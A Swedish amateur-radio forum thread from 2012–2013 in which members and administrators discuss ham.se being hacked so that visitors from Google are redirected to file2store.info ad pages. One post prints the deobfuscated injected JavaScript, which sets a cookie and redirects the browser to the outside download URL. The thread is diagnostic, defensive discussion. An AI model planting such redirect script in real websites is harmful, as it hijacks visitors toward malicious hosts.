Ham.se - Allt om amatörradio

Gå tillbaka   Ham.se - Allt om amatörradio > HAM.se > Nyheter & Feedback

Like Tree4Likes

Svara
 
Tråd
Old 2012-05-02, 15:48   #26
Sheriff
 
Martin Björnströms avatar
 
Blev medlem: Jul 2003
Från: Stockholm
Ålder: 39
Inlägg: 83
Citat:
Ursprungligen skriven av esn Visa inlägg
Nu har jag sniffat en session och kan konstatera att det är ham.se som är infekterat. Samma problem som förra gången.
Jag har precis testat och kan bekräfta felet igen. Sjukt irriterande.
Martin Björnström är offline   Svara med citat
Old 2012-05-02, 17:56   #27
 
Blev medlem: Aug 2011
Inlägg: 178
Citat:
Ursprungligen skriven av Martin Björnström Visa inlägg
Jag har precis testat och kan bekräfta felet igen. Sjukt irriterande.
Som sagt, läs dom länkar jag länkade till i mitt tidigare inlägg:
Ham.se utsatt för hackerattack
SA0BUX är offline   Svara med citat
Old 2012-05-03, 14:14   #28
Sheriff
 
Martin Björnströms avatar
 
Blev medlem: Jul 2003
Från: Stockholm
Ålder: 39
Inlägg: 83
Vi har tömt Datastore och kört verktygen. Men det verkar vara många sajter drabbade och jag har en känsla av att vi kommer diskutera detta vidare igen.
Martin Björnström är offline   Svara med citat
Old 2012-05-10, 11:09   #29
 
SA5BKEs avatar
 
Blev medlem: Jul 2009
Från: Norrköping
Ålder: 32
Inlägg: 225
Hur går det med bortrensningen?
SA5BKE är offline   Svara med citat
Old 2012-05-11, 17:45   #30
 
Blev medlem: Aug 2011
Inlägg: 178
Verkar fortfarande vara problem, jag har inte haft tid att sätta mig in i detta men det verkar som det går att göra sql injection via forumet ifall man inte säkrat upp sqlservern.
SA0BUX är offline   Svara med citat
Old 2012-05-11, 19:44   #31
 
SA5BKEs avatar
 
Blev medlem: Jul 2009
Från: Norrköping
Ålder: 32
Inlägg: 225
Hoppas ingen har samma lösenord här som på annat håll. I så fall, byt på alla, med en gång!

Eric
SA5BKE är offline   Svara med citat
Old 2012-05-11, 23:22   #32
 
Sparkys avatar
 
Blev medlem: Dec 2007
Inlägg: 162
Citat:
Ursprungligen skriven av SM7SEK Visa inlägg
Det skumma är ju att man bara blir omdirigerad när man kommer från google. Går jag direkt in på ham.se har det aldrig skett någon omdirigering. Detta oavsett om jag klickar på länken i de mail som kommer om att tråden uppdaterats eller skriver in adressen manuellt alternativt via bokmärke.

Är det någon som blivit omdirigerad när man gått direkt mot adressen www.ham.se?
Ja, faktiskt. Under ett par veckors tid har jag sporadiskt blivit omdirigerad TILL Google när jag knappat in www.ham.se !!
Har dock aldrig fallit för frestelsen att där (i Google) klicka på någon länk till något över huvud taget (inte ens www.ham.se).
Jag kör IE ver 9.0.8112.16421 med Win7 pro.
Vad jag gjort är att stänga IE, öppnat den igen och via "säkerhet-ta bort webbhistorik" rensat historiken. Därefter åter stängt IE och kört CCleaner. Åtskilliga MB har då ytterligare rensats bort.
Sen försökt att igen att direkt-öppna www.ham.se och då lyckats komma fram utan omdirigeringar.
Detta med omdirigering TILL (obs TILL) Google har jag aldrig upplevt med någon annan webbadress, såvida det inte rört sig om en ren felstavning från mig vid inskrivningen av adressen i adressfältet.
Någon förklaring ??

Sparky
Sparky är offline   Svara med citat
Old 2012-05-12, 00:01   #33
 
Blev medlem: Aug 2011
Inlägg: 178
Det är en javascript kod som ligger på www.ham.se och som triggar ifall du klickar på en ham.se länk från google.

Det enda som fungerar är ifall man ordnar till problemet på källan dvs www.ham.se
SA0BUX är offline   Svara med citat
Old 2012-05-12, 00:22   #34
 
Sparkys avatar
 
Blev medlem: Dec 2007
Inlägg: 162
Citat:
Ursprungligen skriven av SA0BUX Visa inlägg
Det är en javascript kod som ligger på www.ham.se och som triggar ifall du klickar på en ham.se länk från google.

Det enda som fungerar är ifall man ordnar till problemet på källan dvs www.ham.se
Jag upprepar:
Klickade inte på någon länk i/från Google. Jag belv omdirigerad TILL
Google när jag angav adressen www.ham.se i adressfältet !
Frågan om en förklaring återstår....


Sparky
Sparky är offline   Svara med citat
Old 2012-05-12, 10:21   #35
 
Blev medlem: Aug 2011
Inlägg: 178
Sorry, var nog lite dimmig efter att ha sovit på soffan några timmar.

Har du Google som search provider och har "search in the address bar" så kan det kanske hända att browsern ibland inte lyckats slå upp www.ham.se och då i stället
provar en google sökning på det inskrivna.

Eller om man skriver fel, tex. www,ham,se

Man kan stänga av "search in the address bar" men jag vet inte hur Microsoft har tänkt sig man skall söka då, Firefox har både en "address bar" och ett sökfält och båda går att söka via.
SA0BUX är offline   Svara med citat
Old 2012-05-12, 12:01   #36
 
Sparkys avatar
 
Blev medlem: Dec 2007
Inlägg: 162
Citat:
Ursprungligen skriven av SA0BUX Visa inlägg
Sorry, var nog lite dimmig efter att ha sovit på soffan några timmar.

Har du Google som search provider och har "search in the address bar" så kan det kanske hända att browsern ibland inte lyckats slå upp www.ham.se och då i stället
provar en google sökning på det inskrivna.

Eller om man skriver fel, tex. www,ham,se

Man kan stänga av "search in the address bar" men jag vet inte hur Microsoft har tänkt sig man skall söka då, Firefox har både en "address bar" och ett sökfält och båda går att söka via.
Ja, där kan du ha en poäng !
Men man behöver ju inte ha ngn prioriterad "search provider" som default. Det går ju att knappa in Google i adressfältet (eller vilken annan sökmotor som helst), så kanske problemet löser sig om det nu är så som du säger, att browsern inte lyckas hitta adressen alla gåmger !
Tack för en användbar förklaring !
Någon mer som har upplevt samma sak ?
Sparky är offline   Svara med citat
Old 2012-05-12, 17:51   #37
 
SM7CZRs avatar
 
Blev medlem: Feb 2006
Från: Lund
Inlägg: 1606
Har aldrig haft problem med Ham.se
__________________
- Ingvar -
SM7CZR är online nu   Svara med citat
Old 2012-06-11, 23:22   #38
 
SA5BKEs avatar
 
Blev medlem: Jul 2009
Från: Norrköping
Ålder: 32
Inlägg: 225
Finns det några planer från den som driver ham.se att agera på detta?

Eric
SA5BKE är offline   Svara med citat
Old 2012-06-12, 06:58   #39
 
SM5NFTs avatar
 
Blev medlem: Jan 2005
Inlägg: 406
Ja det vore bra. Det är irriterande när man googlat på något radiorelaterat och sedan i resultatet råkar klicka på en länk till ham.se. Man hamnar då på file2store och måste stänga av javascript i webbläsaren för att "komma loss".
SM5NFT är offline   Svara med citat
Old 2012-06-12, 16:15   #40
 
SA7CBRs avatar
 
Blev medlem: Jun 2012
Från: Harlösa
Inlägg: 26
Har heller inte märkt nåt med denna sidan!?
SA7CBR är offline   Svara med citat
Old 2012-06-13, 00:23   #41
 
Blev medlem: Aug 2011
Inlägg: 178
Om man inte lyckats rensa bort javaskriptet från servern så kan det betyda att den fortfarande har någon säkerhetslucka som gör att den blir infekterad igen.

Den nuvarande koden verkar ganska beskedlig men det finns ju risk att det planteras något
mera illvillligt skript på servern.
SA0BUX är offline   Svara med citat
Old 2012-06-16, 13:45   #42
 
Blev medlem: Apr 2012
Inlägg: 1
Samma problem här, när man går från en google länk till ham.se hoppar den till adressen File2Store.info - Your File Hosting
där det kommer upp bland annat unibet reklam.
sa6bsp är offline   Svara med citat
Old 2012-06-17, 12:25   #43
 
Blev medlem: Aug 2011
Inlägg: 178
http://sitecheck.sucuri.net/results/www.ham.se
SA0BUX är offline   Svara med citat
Old 2012-06-17, 13:16   #44
 
Blev medlem: Aug 2011
Inlägg: 178
Så här koden ut som ham.se skickar ut efter att jag "packat" upp den.


Kod:
function ipbcc(_0x601cx2, _0x601cx3) {
    var _0x601cx4 = new Date();
    _0x601cx4['setTime'](_0x601cx4['getTime']() + 86400000);
    var _0x601cx5 = '; expires=' + _0x601cx4['toGMTString']();
    document['cookie'] = _0x601cx2 + '=' + _0x601cx3 + _0x601cx5 + '; path=/'
};
ipbcc('vbsp', '1');
document['location'] = 'http://file2store.info/download.php?id=' + vbsp;
SA0BUX är offline   Svara med citat
Old 2012-06-17, 16:41   #45
QRP
 
Blev medlem: Jan 2005
Inlägg: 321
Google har en diagnossida för just denna:

Google Safe Browsing diagnostic page for file2store.info

På Googles finns uppgifter om att koden skickar & smittar andra
hemsidor med olämpligt innehåll.

//QRP
QRP är online nu   Svara med citat
Old 2012-06-19, 07:04   #46
 
SA5BKEs avatar
 
Blev medlem: Jul 2009
Från: Norrköping
Ålder: 32
Inlägg: 225
Personligen känner jag mig inte så till freds med att "hänga" på ett forum med säkerhetshål. Nu har det gått 1,5 månad utan någon respons om planer på att göra något mer åt detta.

Det kanske är dags att hitta ett nytt forum? Jag såg att ESR hade en ny hemsida och kanske dess forum kan bli ett ham.se-alternativ.

Eric
SA5BKE är offline   Svara med citat
Old 2012-06-19, 10:03   #47
Administrator
 
SM7NZBs avatar
 
Blev medlem: Jul 2003
Från: Göteborg
Inlägg: 782
Någon som kan hjälpa till med problemet?

Någon som kan vara teknisk konsult inom området.

Hör av er till mig: tommy (AT) bjornstrom.se

Vi måste stänga forumet om det anses osäkert och ingen vet hur "datastore"
intrånget går till.

/ Tommy
SM7NZB är offline   Svara med citat
Old 2012-07-30, 10:04   #48
 
Blev medlem: May 2007
Inlägg: 108
Citat:
Ursprungligen skriven av SM7NZB Visa inlägg
Någon som kan hjälpa till med problemet?

Någon som kan vara teknisk konsult inom området.

Hör av er till mig: tommy (AT) bjornstrom.se

Vi måste stänga forumet om det anses osäkert och ingen vet hur "datastore"
intrånget går till.

/ Tommy
Hej Tommy, hur gick det, fick ni stopp på eländet? Själv har jag inte märkt av dessa problem men har efter inläggen här låtit bli att klicka på länkar som google hittat och som leder till ham.se. Är problemet löst så man kan använda de länkar man får fram via google eller ska man avstå?

Hoppas problemet är löst.

// Janne
SM0VPJ är offline   Svara med citat
Old 2012-08-05, 13:43   #49
 
Blev medlem: Aug 2011
Inlägg: 178
Jag tror man har lyckats åtgärda problemet, försökte gå via google träffar men nu blir det ingen redirect utan man kommer till rätt sida på www.ham.se

/L
SA0BUX är offline   Svara med citat
Old 2013-04-18, 09:31   #50
 
Blev medlem: May 2012
Inlägg: 267
Hackat igen?

Citat:
Ursprungligen skriven av SA6BJE Visa inlägg
Det verkar som skadlig kod tagit sig in på ham.se
Söker jag på artiklar på google och klickar på en länk som pekar på ham.se så kommer jag till http //tinyurl4.info/43e20abf

Detta verkar endast ske via google i samband med firefox. Testat både på jobbet och hemma med samma resultat. Jag får inte problemet med Internet Explorer.

......
Kanske något för Admin att undersöka närmare.
......
Idag gjorde jag en sökning på Google, och fick resultat som gick till HAM.se.
När jag klickade på länken kom det upp reklam av den mest påträngande sorten. Man blir irriterad över att besväras av sådant man inte frågat efter.
Jag använder Firefox som web-läsare.
SM3GUJ är offline   Svara med citat
Svara

Tråd

Regler för inlägg
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is
Smilies är
[IMG]-kod är
HTML-kod är
Trackbacks are Av
Pingbacks are Av
Refbacks are Av



Alla tider tillhör tidzonen GMT +2. Klockan är nu 19:12.


Tjänsten bygger på: vBulletin Version 3.8.7
Copyright ©2000 - 2013, Jelsoft Enterprises Ltd.
SEO by vBSEO